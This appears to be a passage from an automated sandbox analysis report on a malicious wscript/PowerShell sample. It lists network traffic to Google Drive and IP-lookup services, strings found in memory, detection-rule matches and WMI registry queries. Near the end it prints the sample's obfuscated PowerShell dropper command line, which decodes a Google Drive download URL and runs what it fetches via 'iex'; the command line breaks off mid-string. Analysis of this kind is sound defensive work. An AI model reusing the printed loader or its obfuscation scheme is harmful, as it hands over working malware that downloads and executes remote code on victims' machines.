Source: |
Binary string: m.Core.pdb source: powershell.exe, 0000000D.00000002.1696029737.000000000864C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ation.pdb source: powershell.exe, 0000000D.00000002.1692787336.00000000076A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.1692787336.00000000076A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbpy source: powershell.exe, 0000000D.00000002.1696029737.000000000864C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.1692787336.00000000076A9000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1GVQK1RBjh0Cl-qe2ukhcp1CD1je1XWHA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: wscript.exe, 00000000.00000003.1241143349.0000027D583B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1240467877.0000027D583AD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1353777806.0000027D5631F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1355322064.0000027D563A9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000002.1355589517.0000027D582C0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1353777806.0000027D5631F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1355322064.0000027D563A9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabny? |
Source: wscript.exe, 00000000.00000003.1241181890.0000027D58327000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241112385.0000027D58300000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0821666a6c |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A42000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000009.00000002.1857076954.000002421FCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000009.00000002.1775276005.000002420FC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1687812642.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000009.00000002.1775276005.000002420FC51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A03000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000009.00000002.1775276005.00000242116AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.000002420FE78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000009.00000002.1775276005.000002420FE78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsTP |
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsTXR |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000009.00000002.1775276005.00000242100DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1i-me5sGoP_YOvAY3oQN7c9m19303jYsT&export=download |
Source: powershell.exe, 00000009.00000002.1775276005.00000242100DC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comv |
Source: powershell.exe, 0000000D.00000002.1687812642.0000000004F18000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000009.00000002.1775276005.0000024210EEF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000009.00000002.1857076954.000002421FCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1690340848.0000000005E28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-u |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000009.00000002.1775276005.0000024211A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.00000242100D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775276005.0000024211A07000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: amsi32_5480.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7868, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5480, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPo |